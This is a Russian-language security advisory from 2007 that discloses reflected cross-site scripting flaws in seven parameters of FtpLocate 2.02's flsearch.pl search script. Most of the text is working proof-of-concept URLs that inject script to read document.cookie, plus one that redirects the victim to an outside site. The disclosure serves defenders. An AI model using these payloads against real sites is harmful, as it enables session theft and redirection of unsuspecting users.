Vulnerabilities в FtpLocate

2007-03-16T00:00:00
ID SECURITYVULNS:DOC:16363
Type securityvulns
Reporter Securityvulns
Modified 2007-03-16T00:00:00

Description

Здравствуйте 3APA3A!

Сообщаю вам о найденных мною 12.10.2006 Cross-Site Scripting уязвимостях в FtpLocate - движке поиска по ftp серверам.

Уязвимости в скрипте flsearch.pl в параметрах all, query, nounix, sizemin, sizemax, sizeunit и sizebytes.

XSS:

http://site/cgi-bin/ftplocate/flsearch.pl?all=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&query=test

http://site/cgi-bin/ftplocate/flsearch.pl?query=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://site/cgi-bin/ftplocate/flsearch.pl?query=test&nounix=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://site/cgi-bin/ftplocate/flsearch.pl?query=test&sizemin=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://site/cgi-bin/ftplocate/flsearch.pl?query=test&sizemax=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://site/cgi-bin/ftplocate/flsearch.pl?query=test&sizeunit=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://site/cgi-bin/ftplocate/flsearch.pl?query=test&sizebytes=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://site/cgi-bin/ftplocate/flsearch.pl?query=test&sizebytes=%22%3E%3Cscript%3Edocument.location%3D'http://websecurity.com.ua'%3C/script%3E

Дополнительная информация о данной уязвимости у меня на сайте: http://websecurity.com.ua/706/ Данные уязвимости имеют место в версии FtpLocate 2.02 (и возможно предыдущих). О найденных уязвимостях я уже сообщил разработчику приложения.

Best wishes & regards, MustLive Администратор сайта http://websecurity.com.ua